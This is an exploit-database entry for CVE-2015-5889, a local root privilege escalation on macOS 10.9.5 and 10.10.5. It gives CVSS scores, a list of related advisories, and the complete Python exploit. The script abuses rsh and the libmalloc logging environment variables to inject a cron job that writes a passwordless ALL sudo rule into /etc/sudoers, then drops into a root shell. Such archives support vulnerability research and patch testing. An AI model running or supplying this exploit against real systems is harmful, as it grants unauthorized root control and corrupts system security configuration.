Lucene search
RebelEXPLOITPACK:02C4B15E9B71426F2725B0FD5AAE79D0HistoryOct 01, 2015 - 12:00 a.m.
Apple Mac OSX 10.9.510.10.5 - rshlibmalloc Local Privilege Escalation
2015-10-0100:00:00
rebel
17
7.2 High
CVSS2
Access Vector
LOCAL
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:L/AC:L/Au:N/C:C/I:C/A:C
Apple Mac OSX 10.9.510.10.5 - rshlibmalloc Local Privilege Escalation
# CVE-2015-5889: issetugid() + rsh + libmalloc osx local root
# tested on osx 10.9.5 / 10.10.5
# jul/2015
# by rebel
import os,time,sys
env = {}
s = os.stat("/etc/sudoers").st_size
env['MallocLogFile'] = '/etc/crontab'
env['MallocStackLogging'] = 'yes'
env['MallocStackLoggingDirectory'] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers\n\n\n\n\n'
sys.stderr.write("creating /etc/crontab..")
p = os.fork()
if p == 0:
os.close(1)
os.close(2)
os.execve("/usr/bin/rsh",["rsh","localhost"],env)
time.sleep(1)
if "NOPASSWD" not in open("/etc/crontab").read():
sys.stderr.write("failed\n")
sys.exit(-1)
sys.stderr.write("done\nwaiting for /etc/sudoers to change (<60 seconds)..")
while os.stat("/etc/sudoers").st_size == s:
sys.stderr.write(".")
time.sleep(1)
sys.stderr.write("\ndone\n")
os.system("sudo su")Related
canvas
canvas
Immunity Canvas: OSX_RSH_LIBMALLOC
2015-10-09 05:59:00
saint
saint
Mac OS X rsh Environment Variables Privilege Elevation
2015-10-15 00:00:00
Mac OS X rsh Environment Variables Privilege Elevation
2015-10-15 00:00:00
Mac OS X rsh Environment Variables Privilege Elevation
2015-10-15 00:00:00
zdt
zdt
Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation
2015-10-01 00:00:00
issetugid() + rsh + libmalloc OS X Local Root Exploit
2015-10-03 00:00:00
Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation Exploit
2015-10-27 00:00:00
threatpost
threatpost
Mac, Linux Users Now Targeted by FinSpy Variants
2020-09-28 19:09:34
prion
prion
Code injection
2015-10-09 05:59:00
packetstorm
packetstorm
issetugid() + rsh + libmalloc OS X Local Root
2015-10-03 00:00:00
Mac OS X 10.9.5 / 10.10.5 rsh/libmalloc Privilege Escalation
2015-10-27 00:00:00
cve
cve
CVE-2015-5889
2015-10-09 05:59:00
exploitdb
exploitdb
kitploit
kitploit
rootOS - macOS Root Helper
2019-03-09 20:25:00
openvas
openvas
Apple Mac OS X Multiple Vulnerabilities-02 (Oct 2015)
2015-10-29 00:00:00
securityvulns
securityvulns
APPLE-SA-2015-09-30-3 OS X El Capitan 10.11
2015-10-05 00:00:00
Apple Mac OS X / Mac EFI / OS X Server multiple security vulnerabilities
2015-10-25 00:00:00
nessus
nessus
Mac OS X < 10.11 Multiple Vulnerabilities (GHOST)
2015-10-05 00:00:00
7.2 High
CVSS2
Access Vector
LOCAL
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:L/AC:L/Au:N/C:C/I:C/A:C
Related for EXPLOITPACK:02C4B15E9B71426F2725B0FD5AAE79D0